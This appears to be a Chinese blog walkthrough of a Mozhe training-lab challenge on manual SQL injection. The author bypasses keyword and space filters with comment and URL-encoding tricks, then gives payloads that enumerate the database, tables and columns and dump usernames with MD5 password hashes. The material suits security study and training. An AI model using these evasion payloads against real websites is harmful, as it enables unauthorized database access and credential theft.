SQL过滤字符后手工注入漏洞测试(第2题)
按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤
尝试利用==/**/空格==进行绕过
?id=1/**/order/**/by/**/4
页面正常说明字段数为4,且order by没有被过滤
接下来利用联合查询,看是否有回显点
输入语句
?id=-1//union//select/**/1,2,3,4发现报错,判断union和select可能被过滤。
我们可以做尝试,把union和select关键字进行url编码在试试效果。
?id=-1/**/%75nion/**/%73elect/**/1,2,3,4
发现页面正常,说明我们推测正确关键字被过滤可以编码绕过(全部编码也可以)
爆出回显位是2和3
接下来利用老套路进行爆破数据库,表,字段,字段内容。
爆库
?id=-1/**/%75nion/**/%73elect/**/1,database(),3,4
根据页面回显知库:mozhe_discuz_stormgroup
爆表 notice,stormgroup_member
输入原始语句发现页面报错,猜测可能from也被过滤from的url编码==%66%72%6f%6d==
-1/**/%75nion/**/%73elect/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup',3,4
接下来对from进行url编码后得SQL语句
-1/**/%75nion/**/%73elect/**/1,group_concat(table_name),3,4/**/%66%72%6f%6d/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'
页面成功回显出表名,因此from也被过滤
爆字段 id,length,name,password,time,status
-1/**/%75nion/**/%73elect/**/1,group_concat(column_name),3,4/**/%66%72%6f%6d/**/information_schema.columns/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'/**/and/**/table_name/**/like/**/'stormgroup_member'
爆字段值
-1/**/%75nion/**/%73elect/**/1,group_concat(name,password),3,4/**/%66%72%6f%6d/**/stormgroup_member
mozhe01d1bff12cf951bbb9f8d1c3e59620255b
mozhe2a6babd9eb561e9ffd6f5aad28851daa7
admin6aa9483f549c490877c01a5baa521371
最后进行MD5解密即可
这里过滤了空格,关键字select,union,from等
方法二:利用Sqlmap进行探测
具体方法可见我的另一个博客
https://blog.csdn.net/qq_43590351/article/details/112855088
这第二题我感觉和第一题解法一样,感觉被骗了,还我墨币啊啊啊啊啊啊啊